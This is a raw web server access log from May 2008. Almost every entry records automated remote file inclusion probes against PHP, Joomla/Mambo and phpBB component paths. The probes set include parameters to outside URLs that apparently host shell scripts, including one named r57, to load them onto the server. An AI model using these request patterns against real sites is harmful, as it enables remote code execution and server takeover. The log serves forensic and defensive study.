88.84.143.195 - - [24/May/2008:10:10:05 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.28.93 - - [24/May/2008:10:10:20 -0700] "GET //header.php?prefix=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.106.28.93 - - [24/May/2008:10:10:20 -0700] "GET /logs//header.php?prefix=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:10:10:22 -0700] "GET /logs/access.log//class/class.dashboard_cms.php?where_framework=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:10:10:22 -0700] "GET //class/class.dashboard_cms.php?where_framework=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:10:10:22 -0700] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:10:24 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:10:10:30 -0700] "GET /logs///modules/Forums/admin/errors.php?error=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.251.172 - - [24/May/2008:10:10:49 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:10:57 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:10:58 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:10:58 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:10:11:02 -0700] "GET /logs//index.php?basePath=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:11:04 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:10:11:04 -0700] "GET //index.php?basePath=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:11:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:11:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:11:11 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:11:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:11:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:11:19 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:20 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.58.186 - - [24/May/2008:10:11:20 -0700] "GET /logs/access.log HTTP/1.0" 200 104309 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:20 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:21 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:24 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:25 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:25 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:11:28 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:11:31 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:11:33 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:35 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:37 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:41 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:11:41 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:11:47 -0700] "GET /logs/sub.php?s=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:11:48 -0700] "GET /sub.php?s=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:11:52 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [24/May/2008:10:11:53 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:11:57 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:12:09 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:12:09 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:12:09 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:12:23 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:12:23 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:23 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:12:23 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:23 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:24 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:36 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:36 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:36 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.59.130 - - [24/May/2008:10:12:41 -0700] "GET /logs//voir.php?inc=http://www.partymax24.de/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.214.59.130 - - [24/May/2008:10:12:41 -0700] "GET //voir.php?inc=http://www.partymax24.de/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:12:41 -0700] "GET /logs//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:12:41 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:42 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:12:55 -0700] "GET /main.php?s=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:12:57 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:13:00 -0700] "GET /logs/access_080215.log//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:13:07 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:13:07 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.7.108.240 - - [24/May/2008:10:13:08 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:13:16 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:13:19 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:10:13:20 -0700] "GET /logs///include/lib.inc.php?site_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:13:39 -0700] "GET /logs/index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:13:42 -0700] "GET /index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:13:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:10:13:47 -0700] "GET /logs/index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:10:13:48 -0700] "GET /index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:13:48 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:13:49 -0700] "GET /logs/access_080312.log//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:13:49 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:13:49 -0700] "GET /logs//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:13:49 -0700] "GET /logs/access_080201.log//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:14:11 -0700] "GET /logs//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:14:12 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:14:18 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:14:34 -0700] "GET /logs/sub.php?menu=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:14:34 -0700] "GET /sub.php?menu=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:10:14:38 -0700] "GET /logs/access_080401.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:14:41 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:10:14:46 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:10:14:47 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:15:11 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:15:26 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:15:32 -0700] "GET /logs/access_080119.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:15:33 -0700] "GET /logs/access_080119.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:15:33 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:15:33 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:15:33 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:15:33 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:15:43 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:15:43 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:15:43 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:16:10 -0700] "GET /catalog/includes/include_once.php?include_file=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:16:12 -0700] "GET /logs/catalog/includes/include_once.php?include_file=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:16:12 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:16:13 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:16:13 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:10:16:33 -0700] "GET /logs/access_080313.log//class/class.dashboard_cms.php?where_framework=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:16:43 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:16:43 -0700] "GET //includes/messages.inc.php?include_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:16:43 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:16:44 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:16:44 -0700] "GET //index.php?option=com_restaurante&task=http://kingsofwarcraft.com/info? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:16:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:16:48 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:16:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:16:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:10:16:54 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:10:16:54 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:17:02 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:17:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:17:04 -0700] "GET /logs/access_080213.log/sub.php?s=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
